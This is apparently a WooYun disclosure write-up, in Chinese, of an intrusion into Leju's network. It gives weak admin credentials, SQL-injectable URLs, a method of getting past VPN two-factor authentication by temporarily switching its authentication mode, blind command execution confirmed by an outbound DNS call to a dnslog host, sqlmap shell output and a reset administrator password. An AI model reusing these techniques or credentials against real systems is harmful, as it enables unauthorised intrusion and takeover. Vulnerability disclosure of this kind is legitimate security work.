WooYun.org

下班回来，打开电脑继续开始尝试漫游新浪之旅。。
看了半天，没啥进展，于是想到了公司分部网络可能相连，想先进乐居内网，再进新浪内网，最后走上一条不归路。
http://lx.leju.com 后台弱口令 admin 123 123

进入后台，存在注入

http://lx.leju.com:80/tongji/lixiangtj?city=2&moban=&type=1&form_id=9

type参数存在注入

注入出一些邮箱，开始尝试爆破，爆破未果。。。
后来发现重头戏了
https:://vpn.leju.com

思科的ssl vpn，还有一个动态密码验证，尼玛
由于之前的cisco-asa认证绕过漏洞，导致我对cisco ssl vpn很熟悉，于是访问https:://vpn.leju.com/admin
跳出来了管理员管理认证窗口，尝试admin admin 成功登陆。。。也是醉了，这么重要的密码竟然是弱口令。。

果断下载控制台，成功进入cisco ASDM 控制台

尝试添加用户访问SSLVPN

有个本地用户，果断添加一个，level15，acess full all 的用户
可是发现无法连接sslvpn，不管怎么设置，后来发现是因为认证是需要动态码的，可是对动态码配置不是很熟悉，翻遍了也没有找到管理接口在哪
折腾了好久，发现下面的东西

leju的vpn组认证方式是dkey的，也就是动态码，上面的都是本地用户，但是上面2个都没有启用，于是我想到，能不能先把leju的认证方式改成本地认证，然后等我连上，再把认证方式改成dkey的，并且祈求vpn不会断线，让我重新认证

果断开始改，成功连接vpn

再把认证方式该成dkey，最后竟然没有断开连接！！

下面就是漫游了，想搞清楚究竟内网和新浪内网到底在不在一起。

老规矩，列个内网域名

列举几个内部系统
搞了好久，最后得结论：内网不在一起，新浪是新浪，乐居是乐居！
内网渗透：
遇到个点，搞了好久，最后才进去，发现是自己傻逼了。。。

内网的web:http://10.207.0.180/
登陆存注入：

http://10.207.0.180/checkpwd.asp?ji=5&password=g00dPa%24%24w0rD&UserName=1

username存在注入，SqlServer ，sa权限
可以执行命令，但是不回显，并且本机没开1433，就下意识的以为SqlServer是其他机器，库站分离

毕竟内网这么多SqlServer，尝试盲执行命令，加个用户

也不知道会不回显，扫描了开启3389的机器，一台台去登陆，没有成功，觉得命令没有执行成功，尝试cloudeye
telnet jboss5.662472.dnslog.info 53
成功收到结果

01-Apr-2016 02:18:15.574 queries: client 202.106.196.219#28205 (jboss5.662472.dnslog.info): query: jboss5.662472.dnslog.info IN A -EDC (128.199.200.236)
01-Apr-2016 02:32:25.804 queries: client 202.106.196.212#46002 (jboss5.662472.dnslog.info): query: jboss5.662472.dnslog.info IN A -EDC (128.199.200.236)

说明命令确实执行了，所以下面的任务就是确定内网ip
但是问题来了，我sql很渣，并且现在各大isp都封445端口，没法拷贝反弹程序到vps上，这里陷入了僵局。
后来想到了servername，毕竟内网机器名可以扫描到的
通过sql-shell执行

sql-shell> select @@servername
[02:43:48] [INFO] fetching SQL SELECT statement query output: 'select @@servername'
[02:43:49] [INFO] retrieved: SHICHANG
select @@servername:    'SHICHANG'

成功得到servername，开启扫描器扫描
最后扫描出来了机器

。。。真是日了狗，就是本机，因为1433没对外开放。。。
那么为什么添加用户命令没有成功了？后来仔细一看是自己傻逼了

有一个/ ，这肯定是不能执行成功的，逗比了。。。
果断重置administrator密码。。 密码：xx.asd.8

搞完收工走人，洗洗睡。。